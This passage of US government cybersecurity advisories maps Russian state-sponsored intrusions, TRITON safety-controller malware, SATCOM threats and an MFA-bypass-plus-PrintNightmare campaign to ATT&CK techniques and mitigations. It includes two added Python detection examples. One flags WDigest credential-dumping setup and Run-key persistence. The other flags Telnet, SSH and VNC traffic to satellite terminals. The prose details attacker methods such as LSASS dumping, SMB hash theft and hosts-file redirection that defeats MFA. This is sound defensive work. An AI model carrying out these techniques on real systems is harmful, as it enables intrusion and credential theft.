Disable or Remove Program: remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.

Privileged Account Management: manage the creation of, modification of, use of, and permissions associated with privileged accounts, including SYSTEM and root.

Command and Scripting Interpreter: Windows Command Shell [T1059.003]

The threat actor used a JavaScript with an embedded Command Shell script to:

  • Create a local administrator account; 
  • Disable the host-based firewall;
  • Globally open port 3389 for RDP access; and
  • Attempt to add the newly created account to the administrators group to gain elevated privileges. 

Note: this activity also applies to: 

  • Tactic: Credential Access [TA0006], Technique: Input Capture [T1056]
  • Tactic: Execution [TA0002], Technique: Command and Scripting Interpreter: JavaScript [T1059.007]
  • Tactic: Persistence [TA0003], Technique: Create Account: Local Account [T1136.001]

Execution Prevention: block execution of code on a system through application control, and/or script blocking.

Scheduled Task/Job: Scheduled Task [T1053.005]

The threat actor created a Scheduled Task to automatically log out of a newly created account every eight hours.

Audit: audit or scan systems, permissions, insecure software, insecure configurations, etc., to identify potential weaknesses.

Harden Operating System Configuration: make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.

Privileged Account Management: manage the creation of, modification of, use of, and permissions associated with privileged accounts, including SYSTEM and root.

User Account Management: manage the creation of, modification of, use of, and permissions associated with user accounts.

Persistence [TA0003]

Create Account: Local Account [T1136.001]

The threat actor created local administrator accounts on previously compromised third-party organizations for reconnaissance and to remotely access Energy Sector targets.

MFA: enforce use of two or more pieces of evidence (such as username and password plus a token, e.g., a physical smart card or token generator) to authenticate to a system.

Privileged Account Management: manage the creation of, modification of, use of, and permissions associated with privileged accounts, including SYSTEM and root.

Server Software Component: Web Shell [T1505.003]

The threat actor created webshells on Energy Sector targets’ publicly accessible email and web servers.

Detect: the portion of the webshell that is on the server may be small and look innocuous. Process monitoring may be used to detect Web servers that perform suspicious actions such as running cmd.exe or accessing files that are not in the Web directory. File monitoring may be used to detect changes to files in the Web directory of a Web server that do not match with updates to the Web server's content and may indicate implantation of a Web shell script. Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network.

Defense Evasion [TA0005]

Indicator Removal on Host: Clear Windows Event Logs [T1070.001]

The threat actor created new accounts on victim networks to perform cleanup operations. The accounts created were used to clear the following Windows event logs: System, Security, Terminal Services, Remote Services, and Audit. 

The threat actor also removed applications they installed while they were in the network along with any logs produced. For example, the VPN client installed at one third-party commercial facility was deleted along with the logs that were produced from its use. Finally, data generated by other accounts used on the systems accessed were deleted.

Note: this activity also applies to:

  • Tactic: Persistence [TA0003], Technique: Create Account: Local Account [T1136.001]

Encrypt Sensitive Information: protect sensitive information with strong encryption.

Remote Data Storage: use remote security log and sensitive file storage where access can be controlled better to prevent exposure of intrusion detection log data or sensitive information.

Restrict File and Directory Permissions: restrict access by setting directory and file permissions that are not specific to users or privileged accounts.

Indicator Removal on Host: File Deletion [T1070.004]

The threat actor cleaned up target networks by deleting created screenshots and specific registry keys. 

The threat actor also deleted all batch scripts, output text documents, and any tools they brought into the environment, such as scr.exe.

Note: this activity also applies to:

  • Technique: Modify Registry [T1112]

Monitor: monitoring for command-line deletion functions to correlate with binaries or other files that an adversary may drop and remove may lead to detection of malicious activity. Another good practice is monitoring for known deletion and secure deletion tools that are not already on systems within an enterprise network that an adversary could introduce. Some monitoring tools may collect command-line arguments, but may not capture DEL commands since DEL is a native function within cmd.exe.

Technique: Masquerading [T1036]

After downloading tools from a remote server, the threat actor renamed the extensions.

Restrict File and Directory Permissions: restrict access by setting directory and file permissions that are not specific to users or privileged accounts.

Code Signing: enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.

Execution Prevention: block execution of code on a system through application control, and/or script blocking.

Credential Access [TA0006]

Brute Force: Password Cracking [T1110.002]

The threat actor used password-cracking techniques to obtain the plaintext passwords from obtained credential hashes.

The threat actor dropped and executed open-source and free password cracking tools such as Hydra, SecretsDump, CrackMapExec, and Python.

MFA: enforce use of two or more pieces of evidence (such as username and password plus a token, e.g., a physical smart card or token generator) to authenticate to a system.

Password Policies: set and enforce secure password policies for accounts.

Forced Authentication [T1187]

Microsoft Word attachments sent via spearphishing emails leveraged legitimate Microsoft Office functions for retrieving a document from a remote server over Server Message Block (SMB) using Transmission Control Protocol ports 445 or 139. As a part of the standard processes executed by Microsoft Word, this request authenticates the client with the server, sending the user’s credential hash to the remote server before retrieving the requested file. (Note: transfer of credentials can occur even if the file is not retrieved.)

Password Policies: set and enforce secure password policies for accounts.

Filter Network Traffic: use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.

The threat actor’s watering hole sites contained altered JavaScript and PHP files that requested a file icon using SMB from an IP address controlled by the threat actors.

The threat actor manipulated LNK files to repeatedly gather user credentials. Default Windows functionality enables icons to be loaded from a local or remote Windows repository. The threat actor exploited this built-in Windows functionality by setting the icon path to a remote server controlled by the actors. When the user browses to the directory, Windows attempts to load the icon and initiate an SMB authentication session. During this process, the active user’s credentials are passed through the attempted SMB connection.

Note: this activity also applies to:

  • Tactic: Persistence [TA0003], Technique: Boot or Logon Autostart Execution: Shortcut Modification [T1547.009]

OS Credential Dumping: Local Security Authority Subsystem Service (LSASS) Memory [T1003.001]

The threat actor used an Administrator PowerShell prompt to enable the WDigest authentication protocol to store plaintext passwords in the LSASS memory. With this enabled, credential harvesting tools can dump passwords from this process’s memory.

Operating System Configuration: make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.

Password Policies: set and enforce secure password policies for accounts.

Privileged Account Management: manage the creation of, modification of, use of, and permissions associated with privileged accounts, including SYSTEM and root.

Privileged Process Integrity: protect processes with high privileges that can be used to interact with critical system components through use of protected process light, anti-process injection defenses, or other process integrity enforcement measures.

User Training: train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.

Credential Access Protection: use capabilities to prevent successful credential access by adversaries; including blocking forms of credential dumping.

OS Credential Dumping: NTDS [T1003.003]

The threat actor collected the file ntds.dit. The file ntds.dit is the Active Directory (AD) database that contains all information related to the AD, including encrypted user passwords.

Monitor: monitor processes and command-line arguments for program execution that may be indicative of credential dumping, especially attempts to access or copy the NTDS.dit.

Privileged Account Management: manage the creation of, modification of, use of, and permissions associated with privileged accounts, including SYSTEM and root.

User Training: train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.

Discovery [TA0007]

Remote System Discovery [T1018]

The threat actor used privileged credentials to access the Energy Sector victim’s domain controller. Once on the domain controller, the threat actors used batch scripts dc.bat and dit.bat to enumerate hosts, users, and additional information about the environment. 

Note: this activity also applies to: 

  • Tactic: Persistence [TA0003], Technique: Valid Accounts: Domain Accounts [T1078.002]
  • Tactic: Discovery [TA0007], Technique: System Owner/User Discovery [T1033]

Monitor: normal, benign system and network events related to legitimate remote system discovery may be uncommon, depending on the environment and how they are used.

Monitor processes and command-line arguments for actions that could be taken to gather system and network information.

Monitor for processes that can be used to discover remote systems, such as ping.exe and tracert.exe, especially when executed in quick succession.

The threat actor accessed workstations and servers on corporate networks that contained data output from control systems within energy generation facilities. The threat actors accessed files pertaining to ICS or supervisory control and data acquisition (SCADA) systems. 

The actor targeted and copied profile and configuration information for accessing ICS systems on the network. The threat actor copied Virtual Network Connection (VNC) profiles that contained configuration information on accessing ICS systems and took screenshots of a Human Machine Interface (HMI).

Note: this activity also applies to:

  • Tactic: Discovery [TA0007], Technique: File and Directory Discovery [T1083]
  • Tactic: Collection [TA0009], Technique: Screen Capture [T1113]

File and Directory Discovery [T1083]

The actor used dirsb.bat to gather folder and file names from hosts on the network.

Note: this activity also applies to: 

  • Tactic: Execution [TA0002], Technique: Command and Scripting Interpreter: Windows Command Shell [T1059.003]

This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of system features. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information.

The threat actor conducted reconnaissance operations within the network. The threat actor focused on identifying and browsing file servers within the intended victim’s network.

Lateral Movement [TA0008]

Lateral Tool Transfer [T1570]

The threat actor moved laterally via PsExec, batch scripts, RDP, VNC, and admin shares.

Note: this activity also applies to:

  • Tactic: Lateral Movement [TA0008], Techniques: 
    • Remote Services: Remote Desktop Protocol [T1021.001]
    • Remote Services: SMB/Windows Admin Shares [T1021.002]
    • Remote Services: VNC [T1021.005]

Network Intrusion Prevention: use intrusion detection signatures to block traffic at network boundaries.

Network Segmentation: architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network.

Operating System Configuration: make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.

Privileged Account Management: manage the creation of, modification of, use of, and permissions associated with privileged accounts, including SYSTEM and root.

User Account Management: manage the creation of, modification of, use of, and permissions associated with user accounts.

Disable or Remove Feature or Program: remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.

Audit: audit or scan systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.

MFA: enforce use of two or more pieces of evidence (such as username and password plus a token, e.g., a physical smart card or token generator) to authenticate to a system.

Limit Access to Resource Over Network: prevent access to file shares, remote access to systems, and unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.

Filter Network Traffic: use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.

Limit Software Installation: block users or groups from installing unapproved software.

Collection [TA0009]

Data from Local System [T1005]

The threat actor collected the Windows SYSTEM registry hive file, which contains host configuration information.

Monitor: monitor processes and command-line arguments for actions that could be taken to collect files from a system. Remote access tools with built-in features may interact directly with the Windows API to gather data.

Data may also be acquired through Windows system management tools such as WMI and PowerShell.

Archive Collected Data: Archive via Utility [T1560.001]

The threat actor compressed the ntds.dit file and the SYSTEM registry hive they had collected into archives named SYSTEM.zip and comps.zip.

Audit: audit or scan systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.

Screen Capture [T1113]

The threat actor used Windows’ Scheduled Tasks and batch scripts to execute scr.exe and collect additional information from hosts on the network. The tool scr.exe is a screenshot utility that the threat actor used to capture the screen of systems across the network.

Note: this activity also applies to: 

  • Tactic: Execution [TA0002], Techniques: 
    • Command and Scripting Interpreter: Windows Command Shell [T1059.003]
    • Scheduled Task/Job: Scheduled Task [T1053.005]

Network Segmentation: architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network.

MFA: enforce use of two or more pieces of evidence (such as username and password plus a token, e.g., a physical smart card or token generator) to authenticate to a system.

Limit Access to Resource Over Network: prevent access to file shares, remote access to systems, and unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.

Disable or Remove Feature or Program: remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.

The actor used batch scripts labeled pss.bat and psc.bat to run the PsExec tool. PsExec was used to execute scr.exe across the network and to collect screenshots of systems in a text file.

Note: this activity also applies to: 

  • Tactic: Execution [TA0002], Techniques: 
    • Command and Scripting Interpreter: Windows Command Shell [T1059.003]
    • System Services: Service Execution [T1569.002]

Command and Control [TA0011]

Ingress Tool Transfer [T1105]

The threat actor downloaded tools from a remote server.

Monitor: monitor for file creation and files transferred into the network. Unusual processes with external network connections creating files on-system may be suspicious. Use of utilities, such as File Transfer Protocol, that does not normally occur may also be suspicious.

Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.

Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.

Use intrusion detection signatures to block traffic at network boundaries.
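
Two rows in the tables above describe registry changes a defender can watch for directly: Havex's Registry Run keys (Table 1, T1547.001) and the WDigest setting enabled before LSASS credential dumping (Table 3, T1003.001). The following is an added example, not part of the advisory: it audits registry value-set events against a baseline. The event field names, sample events, host names and baseline are constructed, and the WDigest value name UseLogonCredential is not given in the advisory.

```python
import re

# Registry Run / RunOnce value writes under HKLM or a per-user hive (T1547.001).
RUN_KEY_RE = re.compile(
    r"^(?:HKLM|HKU\\[^\\]+)\\SOFTWARE\\(?:WOW6432Node\\)?Microsoft\\Windows"
    r"\\CurrentVersion\\(?:Run|RunOnce)\\[^\\]+$",
    re.IGNORECASE,
)
# Value that makes WDigest keep plaintext credentials in LSASS memory when set
# to 1 (T1003.001). The value name is not stated in the advisory.
WDIGEST_VALUE = (
    r"HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders"
    r"\WDigest\UseLogonCredential"
).lower()
DWORD_RE = re.compile(r"DWORD \(0x([0-9a-fA-F]{1,8})\)")

# Constructed baseline: autostart entries already known for this fleet,
# keyed by lower-cased registry path, mapped to the expected command line.
BASELINE = {
    k.lower(): v
    for k, v in {
        r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VendorUpdater":
            r'"C:\Program Files\Vendor\updater.exe" /background',
    }.items()
}

# Constructed registry value-set events (field names are assumptions that
# loosely follow what endpoint registry telemetry usually records).
SAMPLE_EVENTS = [
    {"time": "2022-03-24T10:00:01Z", "host": "WS-01",
     "image": r"C:\Program Files\Vendor\updater.exe",
     "target": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VendorUpdater",
     "details": r'"C:\Program Files\Vendor\updater.exe" /background'},
    {"time": "2022-03-24T10:04:17Z", "host": "WS-02",
     "image": r"C:\Users\alice\AppData\Local\Temp\setup.exe",
     "target": r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001"
               r"\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchelper",
     "details": r"C:\Users\alice\AppData\Roaming\svchelper.exe"},
    {"time": "2022-03-24T10:09:40Z", "host": "DC-01",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "target": r"HKLM\System\CurrentControlSet\Control\SecurityProviders"
               r"\WDigest\UseLogonCredential",
     "details": "DWORD (0x00000001)"},
    {"time": "2022-03-24T10:30:00Z", "host": "DC-02",
     "image": r"C:\Windows\System32\reg.exe",
     "target": r"HKLM\System\CurrentControlSet\Control\SecurityProviders"
               r"\WDigest\UseLogonCredential",
     "details": "DWORD (0x00000000)"},
    {"time": "2022-03-24T11:12:05Z", "host": "WS-01",
     "image": r"C:\Windows\System32\reg.exe",
     "target": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VendorUpdater",
     "details": r"C:\ProgramData\vu\updater.exe"},
]


def finding(rule, technique, ev):
    """Build one finding record from the event that triggered it."""
    return {"rule": rule, "technique": technique, "host": ev["host"],
            "time": ev["time"], "image": ev["image"], "target": ev["target"]}


def audit(events, baseline):
    """Return findings for WDigest enablement and unexplained Run-key writes."""
    findings = []
    for ev in events:
        target = ev["target"].lower()
        if target == WDIGEST_VALUE:
            m = DWORD_RE.fullmatch(ev["details"].strip())
            # Only a write of 1 enables plaintext storage; 0 is the hardened state.
            if m and int(m.group(1), 16) == 1:
                findings.append(finding("wdigest_plaintext_enabled", "T1003.001", ev))
            continue
        if RUN_KEY_RE.match(ev["target"]):
            expected = baseline.get(target)
            if expected is None:
                # Autostart entry that does not correlate with known software.
                findings.append(finding("run_key_unknown", "T1547.001", ev))
            elif expected.lower() != ev["details"].lower():
                # Known entry name, but it now launches something else.
                findings.append(finding("run_key_changed", "T1547.001", ev))
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_EVENTS, BASELINE):
        print(f["time"], f["host"], f["technique"], f["rule"], f["target"])
```

The baseline is what keeps this usable: without it every installer that registers an autostart entry is an alert, which is the "known software, patch cycles" correlation the Table 1 row asks for.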

 

TRITON Malware

Table 4 maps TRITON’s capabilities to the ATT&CK for ICS framework. For mitigations to harden ICS/OT environments, refer to the Mitigations section of this advisory.

Table 4: ICS Domain Tactics and Techniques for TRITON [4]

Initial Access

Engineering Workstation Compromise [T0818]

TRITON compromises workstations within the safety network.

Execution

Change Operating Mode [T0858]

Note: this technique also applies to Evasion.

TRITON can halt or run a program through the TriStation protocol. (Note: TriStation protocol is the protocol that Triconex System software uses to communicate with the Tricon PLCs.) 

Execution through API [T0871]

TRITON leverages a custom implementation of the TriStation protocol, which triggers APIs related to program download, program allocation, and program changes.

Hooking [T0874]

Note: this technique also applies to Tactic: Privilege Escalation.

TRITON's injector modifies the address of the handler for a TriStation protocol command so that when the command is received, the payload may be executed instead of normal processing.

Modify Controller Tasking [T0821]

Some TRITON components are added to the program table on the Tricon so that they are executed by the firmware once each cycle.

Native API [T0834]

TRITON's payload takes commands from TsHi.ExplReadRam(Ex), TsHi.ExplWriteRam(Ex), and TsHi.ExplExec functions to perform operations on controller memory and registers using syscalls written in PowerPC shellcode.

Scripting [T0853]

TRITON communicates with Triconex Tricon PLCs using its custom Python script. This Python script communicates using four Python modules that collectively implement the TriStation protocol via User Datagram Protocol (UDP) 1502.

Note: this use also applies to:

Persistence 

System Firmware [T0857]

Note: this technique also applies to Tactic: Inhibit Response Function.

TRITON's injector injects the payload into the Tricon PLCs’ running firmware. A threat actor can use the payload to read and write memory on the PLC and execute code at an arbitrary address within the firmware. If the memory address it writes to is within the firmware region, the malicious payload disables address translation, writes the code at the provided address, flushes the instruction cache, and re-enables address translation. This allows the malware to change the running firmware.

Privilege Escalation

Exploitation for Privilege Escalation [T0890]

TRITON can gain supervisor-level access and control system states by exploiting a vulnerability.

Evasion

Exploitation for Evasion [T0820]

TRITON's injector exploits a vulnerability in the device firmware to escalate privileges and then disables (and later patches) a firmware RAM/ROM consistency check.

Indicator Removal on Host [T0872]

After running the malicious payload, TRITON's Python script overwrites the malicious payload with a “dummy” program.

Masquerading [T0849]

TRITON’s Python script masquerades as legitimate Triconex software. TRITON’s injector masquerades as a standard compiled PowerPC program for the Triconex PLC.

Discovery

Remote System Discovery [T0846]

TRITON’s Python script can autodetect Triconex PLCs on the network by sending a UDP broadcast packet over port 1502.

Lateral Movement

Program Download [T0843]

TRITON leverages the TriStation protocol to download programs to the Tricon PLCs.

Collection

Detect Operating Mode [T0868]

A TRITON Python module provides string representations of different features of the TriStation protocol, including message and error codes, key position states, and other values returned by the status functions.

Program Upload [T0845]

TRITON uploads its payload to the Tricon PLCs.

Impair Process Control

Unauthorized Command Message [T0855]

A threat actor can use TRITON to prevent the Tricon PLC from functioning appropriately.

Impact

Loss of Safety [T0880]

TRITON can reprogram the safety PLC logic to allow unsafe conditions or state to persist.

Revisions
  • March 24, 2022: Initial Version


AA22-076A: Strengthening Cybersecurity of SATCOM Network Providers and Customers

US-CERT Security Alerts - Thu, 03/17/2022 - 11:00
Original release date: March 17, 2022 | Last revised: May 10, 2022
Summary

Updated May 10, 2022: The U.S. government attributes this threat activity to Russian state-sponsored malicious cyber actors. Additional information may be found in a statement from the State Department. For more information on Russian malicious cyber activity, refer to cisa.gov/uscert/russia.

Actions to Take Today:
• Use secure methods for authentication.
• Enforce principle of least privilege.
• Review trust relationships.
• Implement encryption.
• Ensure robust patching and system configuration audits.
• Monitor logs for suspicious activity.
• Ensure incident response, resilience, and continuity of operations plans are in place.

The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) are aware of possible threats to U.S. and international satellite communication (SATCOM) networks. Successful intrusions into SATCOM networks could create risk in SATCOM network providers’ customer environments.

Given the current geopolitical situation, CISA’s Shields Up initiative requests that all organizations significantly lower their threshold for reporting and sharing indications of malicious cyber activity. To that end, CISA and FBI will update this joint Cybersecurity Advisory (CSA) as new information becomes available so that SATCOM providers and their customers can take additional mitigation steps pertinent to their environments.

CISA and FBI strongly encourage critical infrastructure organizations and other organizations that are either SATCOM network providers or customers to review and implement the mitigations outlined in this CSA to strengthen SATCOM network cybersecurity.

Mitigations

CISA and FBI strongly encourage critical infrastructure organizations and other organizations that are either SATCOM network providers or customers to review and implement the following mitigations:

Mitigations for SATCOM Network Providers
  • Put in place additional monitoring at ingress and egress points to SATCOM equipment to look for anomalous traffic, such as:
    • The presence of insecure remote access tools—such as Teletype Network Protocol (Telnet), File Transfer Protocol (FTP), Secure Shell Protocol (SSH), Secure Copy Protocol (SCP), and Virtual Network Computing (VNC)—facilitating communications to and from SATCOM terminals.
    • Network traffic from SATCOM networks to other unexpected network segments.
    • Unauthorized use of local or backup accounts within SATCOM networks.
    • Unexpected SATCOM terminal to SATCOM terminal traffic.
    • Network traffic from the internet to closed group SATCOM networks.
    • Brute force login attempts over SATCOM network segments.
  • See the Office of the Director of National Intelligence (ODNI) Annual Threat Assessment of the U.S. Intelligence Community, February 2022 for specific state-sponsored cyber threat activity relating to SATCOM networks.
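
The flow-based checks in the provider list above can be expressed as detection logic over flow records. The following is an added example, not part of the advisory; the address plan, the port-to-tool map and the sample flows are constructed assumptions, and it covers the four bullets that can be decided from flow data alone.

```python
import ipaddress

# Assumptions for this example (not from the advisory): address plan and port map.
SATCOM_NETS = [ipaddress.ip_network("10.50.0.0/16")]      # SATCOM terminal ranges
EXPECTED_PEERS = [ipaddress.ip_network("10.10.20.0/24")]  # segments terminals may reach
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8")]      # anything else counts as internet
REMOTE_ACCESS_PORTS = {21: "FTP", 22: "SSH/SCP", 23: "Telnet", 5900: "VNC"}


def within(addr, networks):
    """True if addr belongs to any of the given networks."""
    return any(addr in net for net in networks)


def evaluate_flow(flow):
    """Return the alert labels raised by one flow record (empty list if none)."""
    src = ipaddress.ip_address(flow["src"])
    dst = ipaddress.ip_address(flow["dst"])
    src_sat = within(src, SATCOM_NETS)
    dst_sat = within(dst, SATCOM_NETS)
    if not (src_sat or dst_sat):
        return []  # flow does not touch SATCOM equipment

    alerts = []
    # Remote access tools to or from SATCOM terminals (matched on destination port).
    tool = REMOTE_ACCESS_PORTS.get(flow["dport"]) if flow["proto"] == "tcp" else None
    if tool:
        alerts.append("remote-access:" + tool)
    if src_sat and dst_sat:
        alerts.append("terminal-to-terminal")
    elif src_sat and not within(dst, EXPECTED_PEERS):
        alerts.append("satcom-to-unexpected-segment")
    elif dst_sat and not within(src, INTERNAL_NETS):
        alerts.append("internet-to-satcom")
    return alerts


def scan(flows):
    """Map flow index -> alerts, keeping only flows that raised something."""
    results = {}
    for index, flow in enumerate(flows):
        alerts = evaluate_flow(flow)
        if alerts:
            results[index] = alerts
    return results


# Constructed flow records for illustration only.
SAMPLE_FLOWS = [
    {"src": "10.10.20.5", "dst": "10.50.1.10", "proto": "tcp", "dport": 443},
    {"src": "10.10.20.5", "dst": "10.50.1.10", "proto": "tcp", "dport": 23},
    {"src": "10.50.1.10", "dst": "10.50.2.20", "proto": "udp", "dport": 5060},
    {"src": "10.50.1.10", "dst": "10.30.0.8", "proto": "tcp", "dport": 445},
    {"src": "198.51.100.7", "dst": "10.50.1.10", "proto": "tcp", "dport": 5900},
    {"src": "10.10.20.5", "dst": "10.30.0.8", "proto": "tcp", "dport": 22},
    {"src": "10.50.1.10", "dst": "10.10.20.5", "proto": "udp", "dport": 514},
]

if __name__ == "__main__":
    for index, alerts in scan(SAMPLE_FLOWS).items():
        print(index, SAMPLE_FLOWS[index]["src"], "->", SAMPLE_FLOWS[index]["dst"], alerts)
```

Matching on destination port misses tools moved to non-standard ports, so the baseline and deviation checks recommended later in the advisory remain necessary alongside rules like these.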
Mitigations for SATCOM Network Providers and Customers
  • Use secure methods for authentication, including multifactor authentication where possible, for all accounts used to access, manage, and/or administer SATCOM networks. 
    • Use and enforce strong, complex passwords: Review password policies to ensure they align with the latest NIST guidelines.
    • Do not use default credentials or weak passwords.
    • Audit accounts and credentials: remove terminated or unnecessary accounts; change expired credentials.
  • Enforce principle of least privilege through authorization policies. Minimize unnecessary privileges for identities. Consider privileges assigned to individual personnel accounts, as well as those assigned to non-personnel accounts (e.g., those assigned to software or systems). Account privileges should be clearly defined, narrowly scoped, and regularly audited against usage patterns.
  • Review trust relationships. Review existing trust relationships with IT service providers. Threat actors are known to exploit trust relationships between providers and their customers to gain access to customer networks and data.  
    • Remove unnecessary trust relationships. 
    • Review contractual relationships with all service providers. Ensure contracts include appropriate provisions addressing security, such as those listed below, and that these provisions are appropriately leveraged: 
      • Security controls the customer deems appropriate. 
      • Provider should have in place appropriate monitoring and logging of provider-managed customer systems.
      • Customer should have in place appropriate monitoring of the service provider’s presence, activities, and connections to the customer network.
      • Notification of confirmed or suspected security events and incidents occurring on the provider’s infrastructure and administrative networks.
  • Implement independent encryption across all communications links leased from, or provided by, your SATCOM provider. See National Security Agency (NSA) Cybersecurity Advisory: Protecting VSAT Communications for guidance.
  • Strengthen the security of operating systems, software, and firmware.
    • Ensure robust vulnerability management and patching practices are in place and, after testing, immediately patch known exploited vulnerabilities included in CISA's living catalog of known exploited vulnerabilities. These vulnerabilities carry significant risk to federal agencies as well as public and private sectors entities. 
    • Implement rigorous configuration management programs. Ensure the programs can track and mitigate emerging threats. Regularly audit system configurations for misconfigurations and security weaknesses.
  • Monitor network logs for suspicious activity and unauthorized or unusual login attempts.
    • Integrate SATCOM traffic into existing network security monitoring tools.
    • Review logs of systems behind SATCOM terminals for suspicious activity.
    • Ingest system and network generated logs into your enterprise security information and event management (SIEM) tool. 
    • Implement endpoint detection and response (EDR) tools where possible on devices behind SATCOM terminals, and ingest into the SIEM.
    • Expand and enhance monitoring of network segments and assets that use SATCOM.
    • Expand monitoring to include ingress and egress traffic transiting SATCOM links and monitor for suspicious or anomalous network activity. 
    • Baseline SATCOM network traffic to determine what is normal and investigate deviations, such as large spikes in traffic.
  • Create, maintain, and exercise a cyber incident response plan, resilience plan, and continuity of operations plan so that critical functions and operations can be kept running if technology systems—including SATCOM networks—are disrupted or need to be taken offline.
Contact Information

All organizations should report incidents and anomalous activity to CISA 24/7 Operations Center at report@cisa.gov or (888) 282-0870 and/or to the FBI via your local FBI field office or the FBI’s 24/7 CyWatch at (855) 292-3937 or CyWatch@fbi.gov.

Revisions
  • March 17, 2022: Initial Version
  • May 10, 2022: Added Attribution


AA22-074A: Russian State-Sponsored Cyber Actors Gain Network Access by Exploiting Default Multifactor Authentication Protocols and “PrintNightmare” Vulnerability

US-CERT Security Alerts - Tue, 03/15/2022 - 06:00
Original release date: March 15, 2022 | Last revised: May 2, 2022
Summary

Multifactor Authentication (MFA): A Cybersecurity Essential
• MFA is one of the most important cybersecurity practices to reduce the risk of intrusions—according to industry research, users who enable MFA are up to 99 percent less likely to have an account compromised.
• Every organization should enforce MFA for all employees and customers, and every user should sign up for MFA when available.
• Organizations that implement MFA should review default configurations and modify as necessary, to reduce the likelihood that a sophisticated adversary can circumvent this control.

The Federal Bureau of Investigation (FBI) and Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory (CSA) to warn organizations that Russian state-sponsored cyber actors have gained network access through exploitation of default MFA protocols and a known vulnerability. As early as May 2021, Russian state-sponsored cyber actors took advantage of a misconfigured account set to default MFA protocols at a non-governmental organization (NGO), allowing them to enroll a new device for MFA and access the victim network. The actors then exploited a critical Windows Print Spooler vulnerability, “PrintNightmare” (CVE-2021-34527) to run arbitrary code with system privileges. Russian state-sponsored cyber actors successfully exploited the vulnerability while targeting an NGO using Cisco’s Duo MFA, enabling access to cloud and email accounts for document exfiltration.

This advisory provides observed tactics, techniques, and procedures, indicators of compromise (IOCs), and recommendations to protect against Russian state-sponsored malicious cyber activity. FBI and CISA urge all organizations to apply the recommendations in the Mitigations section of this advisory, including the following:

  • Enforce MFA and review configuration policies to protect against “fail open” and re-enrollment scenarios.
  • Ensure inactive accounts are disabled uniformly across the Active Directory and MFA systems. 
  • Patch all systems. Prioritize patching for known exploited vulnerabilities.

For more general information on Russian state-sponsored malicious cyber activity, see CISA's Russia Cyber Threat Overview and Advisories webpage. For more information on the threat of Russian state-sponsored malicious cyber actors to U.S. critical infrastructure as well as additional mitigation recommendations, see joint CSA Understanding and Mitigating Russian State-Sponsored Cyber Threats to U.S. Critical Infrastructure and CISA's Shields Up Technical Guidance webpage.

For a downloadable copy of IOCs, see AA22-074A.stix.

Technical Details

Threat Actor Activity

Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 10. See Appendix A for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques.

As early as May 2021, the FBI observed Russian state-sponsored cyber actors gain access to an NGO, exploit a flaw in default MFA protocols, and move laterally to the NGO’s cloud environment.

Russian state-sponsored cyber actors gained initial access [TA0001] to the victim organization via compromised credentials [T1078] and by enrolling a new device in the organization’s Duo MFA. The actors gained the credentials [TA0006] via a brute-force password guessing attack [T1110.001], allowing them access to a victim account with a simple, predictable password. The victim account had been un-enrolled from Duo due to a long period of inactivity but was not disabled in the Active Directory. As Duo’s default configuration settings allow for the re-enrollment of a new device for dormant accounts, the actors were able to enroll a new device for this account, complete the authentication requirements, and obtain access to the victim network.

Using the compromised account, Russian state-sponsored cyber actors performed privilege escalation [TA0004] via exploitation of the “PrintNightmare” vulnerability (CVE-2021-34527) [T1068] to obtain administrator privileges. The actors also modified a domain controller file, c:\windows\system32\drivers\etc\hosts, redirecting Duo MFA calls to localhost instead of the Duo server [T1556]. This change prevented the MFA service from contacting its server to validate MFA login—this effectively disabled MFA for active domain accounts because the default policy of Duo for Windows is to “Fail open” if the MFA server is unreachable. Note: “fail open” can happen to any MFA implementation and is not exclusive to Duo.

After effectively disabling MFA, Russian state-sponsored cyber actors were able to successfully authenticate to the victim’s virtual private network (VPN) as non-administrator users and make Remote Desktop Protocol (RDP) connections to Windows domain controllers [T1133]. The actors ran commands to obtain credentials for additional domain accounts; then using the method described in the previous paragraph, changed the MFA configuration file and bypassed MFA for these newly compromised accounts. The actors leveraged mostly internal Windows utilities already present within the victim network to perform this activity.  

Using these compromised accounts without MFA enforced, Russian state-sponsored cyber actors were able to move laterally [TA0008] to the victim’s cloud storage and email accounts and access desired content. 

